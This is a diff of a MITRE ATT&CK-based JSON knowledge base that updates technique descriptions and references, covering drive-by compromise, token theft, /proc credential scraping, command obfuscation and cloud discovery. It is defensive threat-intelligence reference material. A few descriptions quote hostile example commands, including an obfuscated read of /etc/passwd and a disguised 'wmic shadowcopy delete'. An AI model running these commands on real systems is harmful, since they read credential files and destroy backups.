- "description": "Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://attack.mitre.org/techniques/T1550/001).\n\nMultiple ways of delivering exploit code to a browser exist, including:\n\n* A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting.\n* Malicious ads are paid for and served through legitimate ad providers.\n* Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).\n\nOften the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is often referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise)\n\nTypical drive-by compromise process:\n\n1. A user visits a website that is used to host the adversary controlled content.\n2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. \n * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.\n3. Upon finding a vulnerable version, exploit code is delivered to the browser.\n4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place.\n * In some cases a second visit to the website after the initial scan is required before exploit code is delivered.\n\nUnlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.\n\nAdversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.(Citation: Volexity OceanLotus Nov 2017)",
+ "description": "Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://attack.mitre.org/techniques/T1550/001).\n\nMultiple ways of delivering exploit code to a browser exist (i.e., [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)), including:\n\n* A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting\n* Script files served to a legitimate website from a publicly writeable cloud storage bucket are modified by an adversary\n* Malicious ads are paid for and served through legitimate ad providers (i.e., [Malvertising](https://attack.mitre.org/techniques/T1583/008))\n* Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).\n\nOften the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is often referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise)\n\nTypical drive-by compromise process:\n\n1. A user visits a website that is used to host the adversary controlled content.\n2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. \n * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.\n3. Upon finding a vulnerable version, exploit code is delivered to the browser.\n4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place.\n * In some cases a second visit to the website after the initial scan is required before exploit code is delivered.\n\nUnlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.\n\nAdversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.(Citation: Volexity OceanLotus Nov 2017)",
"meta": {
"external_id": "T1189",
"kill_chain": [
@@ -16905,7 +17092,7 @@
"value": "Inter-Process Communication - T1559"
},
{
- "description": "Adversaries may duplicate then impersonate another user's token to escalate privileges and bypass access controls. An adversary can create a new access token that duplicates an existing token using DuplicateToken(Ex). The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user's security context, or with SetThreadToken to assign the impersonated token to a thread.\n\nAn adversary may do this when they have a specific, existing process they want to assign the new token to. For example, this may be useful for when the target user has a non-network logon session on the system.",
+ "description": "Adversaries may duplicate then impersonate another user's existing token to escalate privileges and bypass access controls. For example, an adversary can duplicate an existing token using `DuplicateToken` or `DuplicateTokenEx`. The token can then be used with `ImpersonateLoggedOnUser` to allow the calling thread to impersonate a logged on user's security context, or with `SetThreadToken` to assign the impersonated token to a thread.\n\nAn adversary may perform [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) when they have a specific, existing process they want to assign the duplicated token to. For example, this may be useful for when the target user has a non-network logon session on the system.\n\nWhen an adversary would instead use a duplicated token to create a new process rather than attaching to an existing process, they can additionally [Create Process with Token](https://attack.mitre.org/techniques/T1134/002) using `CreateProcessWithTokenW` or `CreateProcessAsUserW`. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) is also distinct from [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003) in that it refers to duplicating an existing token, rather than creating a new one.",
"meta": {
"external_id": "T1134.001",
"kill_chain": [
@@ -16988,7 +17175,7 @@
"value": "Junk Data - T1001.001"
},
{
- "description": "Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised network infrastructure. Traffic mirroring is a native feature for some network devices and used for network analysis and may be configured to duplicate traffic and forward to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring)\n\nAdversaries may abuse traffic mirroring to mirror or redirect network traffic through other network infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System Image](https://attack.mitre.org/techniques/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) Adversaries may use traffic duplication in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives of the adversary.",
+ "description": "Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring)\n\nAdversaries may abuse traffic mirroring to mirror or redirect network traffic through other infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System Image](https://attack.mitre.org/techniques/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks)\n\nMany cloud-based environments also support traffic mirroring. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring)(Citation: GCP Packet Mirroring)(Citation: Azure Virtual Network TAP)\n\nAdversaries may use traffic duplication in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives of the adversary.",
"meta": {
"external_id": "T1020.001",
"kill_chain": [
@@ -16999,12 +17186,15 @@
"Network Traffic: Network Traffic Flow"
],
"mitre_platforms": [
- "Network"
+ "Network",
+ "IaaS"
],
"refs": [
"https://attack.mitre.org/techniques/T1020/001",
- "https://capec.mitre.org/data/definitions/117.html",
+ "https://cloud.google.com/vpc/docs/packet-mirroring",
"https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954",
+ "https://docs.aws.amazon.com/vpc/latest/mirroring/traffic-mirroring-how-it-works.html",
+ "https://docs.microsoft.com/en-us/azure/virtual-network/virtual-network-tap-overview",
"https://www.cisco.com/c/en/us/td/docs/routers/crs/software/crs_r5-1/interfaces/configuration/guide/hc51xcrsbook/hc51span.html",
"https://www.juniper.net/documentation/en_US/junos/topics/concept/port-mirroring-ex-series.html",
"https://www.us-cert.gov/ncas/alerts/TA18-106A"
@@ -17180,7 +17370,7 @@
"value": "LSA Secrets - T1003.004"
},
{
- "description": "Adversaries may gather credentials from information stored in the Proc filesystem or /proc. The Proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively.\n\nThis functionality has been implemented in the MimiPenguin(Citation: MimiPenguin GitHub May 2017), an open source tool inspired by Mimikatz. The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.",
+ "description": "Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc//maps` file shows how memory is mapped within the process’s virtual address space. And `/proc//mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)\n\nWhen executing with root privileges, adversaries can search these memory locations for all processes on a system that contain patterns that are indicative of credentials, such as looking for fixed strings in memory structures or cached hashes. When running without privileged access, processes can still view their own virtual memory locations. Some services or programs may save credentials in clear text inside the process’s memory.(Citation: MimiPenguin GitHub May 2017)(Citation: Polop Linux PrivEsc Gitbook)\n\nIf running as or with the permissions of a web browser, a process can search the `/maps` & `/mem` locations for common website credential patterns (that can also be used to find adjacent memory within the same structure) in which hashes or cleartext credentials may be located.",
"meta": {
"external_id": "T1003.007",
"kill_chain": [
@@ -17195,7 +17385,10 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1003/007",
- "https://github.com/huntergregal/mimipenguin"
+ "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#proc-usdpid-maps-and-proc-usdpid-mem",
+ "https://github.com/huntergregal/mimipenguin",
+ "https://www.baeldung.com/linux/proc-id-maps",
+ "https://www.picussecurity.com/resource/the-mitre-attck-t1003-os-credential-dumping-technique-and-its-adversary-use"
]
},
"related": [
@@ -17254,8 +17447,7 @@
],
"refs": [
"http://www.icir.org/vern/papers/meek-PETS-2015.pdf",
- "https://attack.mitre.org/techniques/T1090/004",
- "https://capec.mitre.org/data/definitions/481.html"
+ "https://attack.mitre.org/techniques/T1090/004"
]
},
"related": [
@@ -17268,7 +17460,7 @@
"value": "Domain Fronting - T1090.004"
},
{
- "description": "Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm)\n\nIn some instances, artifacts of persistence may also be removed once an adversary’s persistence is executed in order to prevent errors with the new instance of the malware.(Citation: NCC Group Team9 June 2020)",
+ "description": "Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm) Adversaries may also delete accounts previously created to maintain persistence (i.e. [Create Account](https://attack.mitre.org/techniques/T1136)).(Citation: Talos - Cisco Attack 2022)\n\nIn some instances, artifacts of persistence may also be removed once an adversary’s persistence is executed in order to prevent errors with the new instance of the malware.(Citation: NCC Group Team9 June 2020)",
"meta": {
"external_id": "T1070.009",
"kill_chain": [
@@ -17280,6 +17472,7 @@
"File: File Modification",
"Process: Process Creation",
"Scheduled Job: Scheduled Job Modification",
+ "User Account: User Account Deletion",
"Windows Registry: Windows Registry Key Deletion",
"Windows Registry: Windows Registry Key Modification"
],
@@ -17290,6 +17483,7 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1070/009",
+ "https://blog.talosintelligence.com/recent-cyber-attack/",
"https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/",
"https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf"
]
@@ -17328,7 +17522,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1110/001",
- "https://capec.mitre.org/data/definitions/49.html",
"https://web.archive.org/web/20200302085133/https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf",
"https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/emotet-now-spreads-via-wi-fi",
"https://www.us-cert.gov/ncas/alerts/TA18-086A"
@@ -17364,7 +17557,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1110/002",
- "https://capec.mitre.org/data/definitions/55.html",
"https://en.wikipedia.org/wiki/Password_cracking",
"https://www.us-cert.gov/ncas/alerts/TA18-106A"
]
@@ -17403,7 +17595,6 @@
"refs": [
"http://www.blackhillsinfosec.com/?p=4645",
"https://attack.mitre.org/techniques/T1110/003",
- "https://capec.mitre.org/data/definitions/565.html",
"https://www.trimarcsecurity.com/single-post/2018/05/06/Trimarc-Research-Detecting-Password-Spraying-with-Security-Event-Auditing",
"https://www.us-cert.gov/ncas/alerts/TA18-086A"
]
@@ -17441,7 +17632,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1110/004",
- "https://capec.mitre.org/data/definitions/600.html",
"https://www.us-cert.gov/ncas/alerts/TA18-086A"
]
},
@@ -17455,7 +17645,7 @@
"value": "Credential Stuffing - T1110.004"
},
{
- "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as HTTP and HTTPS that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ",
+ "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as HTTP/S(Citation: CrowdStrike Putter Panda) and WebSocket(Citation: Brazking-Websockets) that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ",
"meta": {
"external_id": "T1071.001",
"kill_chain": [
@@ -17471,8 +17661,10 @@
"Windows"
],
"refs": [
+ "http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf",
"https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf",
- "https://attack.mitre.org/techniques/T1071/001"
+ "https://attack.mitre.org/techniques/T1071/001",
+ "https://securityintelligence.com/posts/brazking-android-malware-upgraded-targeting-brazilian-banks/"
]
},
"related": [
@@ -17595,8 +17787,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1027/001",
- "https://capec.mitre.org/data/definitions/572.html",
- "https://capec.mitre.org/data/definitions/655.html",
"https://securelist.com/old-malware-tricks-to-bypass-detection-in-the-age-of-big-data/78010/",
"https://www.virustotal.com/en/faq/",
"https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/"
@@ -17611,6 +17801,75 @@
"uuid": "5bfccc3f-2326-4112-86cc-c1ece9d8a2b5",
"value": "Binary Padding - T1027.001"
},
+ {
+ "description": "Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai JS)(Citation: Malware Monday VBE)\n\nFor example, adversaries may abuse syntax that utilizes various symbols and escape characters (such as spacing, `^`, `+`. `$`, and `%`) to make commands difficult to analyze while maintaining the same intended functionality.(Citation: RC PowerShell) Many languages support built-in obfuscation in the form of base64 or URL encoding.(Citation: Microsoft PowerShellB64) Adversaries may also manually implement command obfuscation via string splitting (`“Wor”+“d.Application”`), order and casing of characters (`rev <<<'dwssap/cte/ tac'`), globing (`mkdir -p '/tmp/:&$NiA'`), as well as various tricks involving passing strings through tokens/environment variables/input streams.(Citation: Bashfuscator Command Obfuscators)(Citation: FireEye Obfuscation June 2017)\n\nAdversaries may also use tricks such as directory traversals to obfuscate references to the binary being invoked by a command (`C:\\voi\\pcw\\..\\..\\Windows\\tei\\qs\\k\\..\\..\\..\\system32\\erool\\..\\wbem\\wg\\je\\..\\..\\wmic.exe shadowcopy delete`).(Citation: Twitter Richard WMIC)\n\nTools such as Invoke-Obfuscation and Invoke-DOSfucation have also been used to obfuscate commands.(Citation: Invoke-DOSfuscation)(Citation: Invoke-Obfuscation)",
+ "meta": {
+ "external_id": "T1027.010",
+ "kill_chain": [
+ "mitre-attack:defense-evasion"
+ ],
+ "mitre_data_sources": [
+ "Command: Command Execution",
+ "File: File Metadata",
+ "Script: Script Execution"
+ ],
+ "mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ],
+ "refs": [
+ "https://attack.mitre.org/techniques/T1027/010",
+ "https://bashfuscator.readthedocs.io/en/latest/Mutators/command_obfuscators/index.html",
+ "https://bromiley.medium.com/malware-monday-vbscript-and-vbe-files-292252c1a16",
+ "https://github.com/danielbohannon/Invoke-DOSfuscation",
+ "https://github.com/danielbohannon/Invoke-Obfuscation",
+ "https://learn.microsoft.com/powershell/module/microsoft.powershell.core/about/about_powershell_exe?view=powershell-5.1#-encodedcommand-base64encodedcommand",
+ "https://redcanary.com/threat-detection-report/techniques/powershell/",
+ "https://twitter.com/rfackroyd/status/1639136000755765254",
+ "https://web.archive.org/web/20170923102302/https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html",
+ "https://www.akamai.com/blog/security/catch-me-if-you-can-javascript-obfuscation"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "type": "subtechnique-of"
+ }
+ ],
+ "uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "value": "Command Obfuscation - T1027.010"
+ },
+ {
+ "description": "Adversaries may log into accessible cloud services within a compromised environment using [Valid Accounts](https://attack.mitre.org/techniques/T1078) that are synchronized with or federated to on-premises user identities. The adversary may then perform management actions or access cloud-hosted resources as the logged-on user. \n\nMany enterprises federate centrally managed user identities to cloud services, allowing users to login with their domain credentials in order to access the cloud control plane. Similarly, adversaries may connect to available cloud services through the web console or through the cloud command line interface (CLI) (e.g., [Cloud API](https://attack.mitre.org/techniques/T1059/009)), using commands such as Connect-AZAccount for Azure PowerShell, Connect-MgGraph for Microsoft Graph PowerShell, and gcloud auth login for the Google Cloud CLI.\n\nIn some cases, adversaries may be able to authenticate to these services via [Application Access Token](https://attack.mitre.org/techniques/T1550/001) instead of a username and password. ",
+ "meta": {
+ "external_id": "T1021.007",
+ "kill_chain": [
+ "mitre-attack:lateral-movement"
+ ],
+ "mitre_data_sources": [
+ "Logon Session: Logon Session Creation"
+ ],
+ "mitre_platforms": [
+ "Office 365",
+ "Azure AD",
+ "SaaS",
+ "IaaS",
+ "Google Workspace"
+ ],
+ "refs": [
+ "https://attack.mitre.org/techniques/T1021/007"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "54a649ff-439a-41a4-9856-8d144a2551ba",
+ "type": "subtechnique-of"
+ }
+ ],
+ "uuid": "8861073d-d1b8-4941-82ce-dce621d398f0",
+ "value": "Cloud Services - T1021.007"
+ },
{
"description": "Adversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as SMTP/S, POP3/S, and IMAP that carry electronic mail may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the email messages themselves. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ",
"meta": {
@@ -17740,7 +17999,7 @@
"value": "Web Cookies - T1606.001"
},
{
- "description": "Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.\n\nMalware may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Malware can also be staged on web services, such as GitHub or Pastebin.(Citation: Volexity Ocean Lotus November 2020)\n\nAdversaries may upload backdoored files, such as application binaries, virtual machine images, or container images, to third-party software stores or repositories (ex: GitHub, CNET, AWS Community AMIs, Docker Hub). By chance encounter, victims may directly download/install these backdoored files via [User Execution](https://attack.mitre.org/techniques/T1204). [Masquerading](https://attack.mitre.org/techniques/T1036) may increase the chance of users mistakenly executing these files.",
+ "description": "Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.\n\nMalware may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Malware can also be staged on web services, such as GitHub or Pastebin, or hosted on the InterPlanetary File System (IPFS), where decentralized content storage makes the removal of malicious files difficult.(Citation: Volexity Ocean Lotus November 2020)(Citation: Talos IPFS 2022)\n\nAdversaries may upload backdoored files, such as application binaries, virtual machine images, or container images, to third-party software stores or repositories (ex: GitHub, CNET, AWS Community AMIs, Docker Hub). By chance encounter, victims may directly download/install these backdoored files via [User Execution](https://attack.mitre.org/techniques/T1204). [Masquerading](https://attack.mitre.org/techniques/T1036) may increase the chance of users mistakenly executing these files.",
"meta": {
"external_id": "T1608.001",
"kill_chain": [
@@ -17754,6 +18013,7 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1608/001",
+ "https://blog.talosintelligence.com/ipfs-abuse/",
"https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/"
]
},
@@ -17824,7 +18084,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1078/001",
- "https://capec.mitre.org/data/definitions/70.html",
"https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html",
"https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts",
"https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/linux/ssh",
@@ -17955,7 +18214,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1027/002",
- "https://capec.mitre.org/data/definitions/570.html",
"https://github.com/dhondta/awesome-executable-packing",
"https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf"
]
@@ -18271,7 +18529,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1078/002",
- "https://capec.mitre.org/data/definitions/560.html",
"https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-accounts",
"https://technet.microsoft.com/en-us/library/dn487457.aspx",
"https://technet.microsoft.com/en-us/library/dn535501.aspx",
@@ -18288,7 +18545,7 @@
"value": "Domain Accounts - T1078.002"
},
{
- "description": "Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior.\n\nCommands such as net user /domain and net group /domain of the [Net](https://attack.mitre.org/software/S0039) utility, dscacheutil -q groupon macOS, and ldapsearch on Linux can list domain users and groups.",
+ "description": "Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior such as targeting specific accounts which possess particular privileges.\n\nCommands such as net user /domain and net group /domain of the [Net](https://attack.mitre.org/software/S0039) utility, dscacheutil -q groupon macOS, and ldapsearch on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets including Get-ADUser and Get-ADGroupMember may enumerate members of Active Directory groups. ",
"meta": {
"external_id": "T1087.002",
"kill_chain": [
@@ -18307,8 +18564,7 @@
"Windows"
],
"refs": [
- "https://attack.mitre.org/techniques/T1087/002",
- "https://capec.mitre.org/data/definitions/575.html"
+ "https://attack.mitre.org/techniques/T1087/002"
]
},
"related": [
@@ -18488,7 +18744,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1505/003",
- "https://capec.mitre.org/data/definitions/650.html",
"https://github.com/nsacyber/Mitigating-Web-Shells",
"https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html",
"https://www.us-cert.gov/ncas/alerts/TA15-314A",
@@ -18574,7 +18829,7 @@
"value": "Startup Items - T1037.005"
},
{
- "description": "Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.\n\nWith authenticated access there are several tools that can be used to find permissions groups. The Get-MsolRole PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts (Citation: Microsoft Msolrole)(Citation: GitHub Raindance).\n\nAzure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command az ad user get-member-groups will list groups associated to a user account for Azure while the API endpoint GET https://cloudidentity.googleapis.com/v1/groups lists group resources available to a user for Google.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation)\n\nAdversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS GetBucketAcl API (Citation: AWS Get Bucket ACL). Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object.",
+ "description": "Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.\n\nWith authenticated access there are several tools that can be used to find permissions groups. The Get-MsolRole PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts (Citation: Microsoft Msolrole)(Citation: GitHub Raindance).\n\nAzure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command az ad user get-member-groups will list groups associated to a user account for Azure while the API endpoint GET https://cloudidentity.googleapis.com/v1/groups lists group resources available to a user for Google.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation) In AWS, the commands `ListRolePolicies` and `ListAttachedRolePolicies` allow users to enumerate the policies attached to a role.(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)\n\nAdversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS GetBucketAcl API (Citation: AWS Get Bucket ACL). Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object.",
"meta": {
"external_id": "T1069.003",
"kill_chain": [
@@ -18601,6 +18856,7 @@
"https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest",
"https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrole?view=azureadps-1.0",
"https://github.com/True-Demon/raindance",
+ "https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/",
"https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/"
]
},
@@ -18773,7 +19029,7 @@
"value": "Unix Shell - T1059.004"
},
{
- "description": "Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory.(Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)\n\nCompromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment.\n\nOnce a cloud account is compromised, an adversary may perform [Account Manipulation](https://attack.mitre.org/techniques/T1098) - for example, by adding [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) - to maintain persistence and potentially escalate their privileges.",
+ "description": "Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management systems, such as Windows Active Directory.(Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)\n\nCompromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment.\n\nOnce a cloud account is compromised, an adversary may perform [Account Manipulation](https://attack.mitre.org/techniques/T1098) - for example, by adding [Additional Cloud 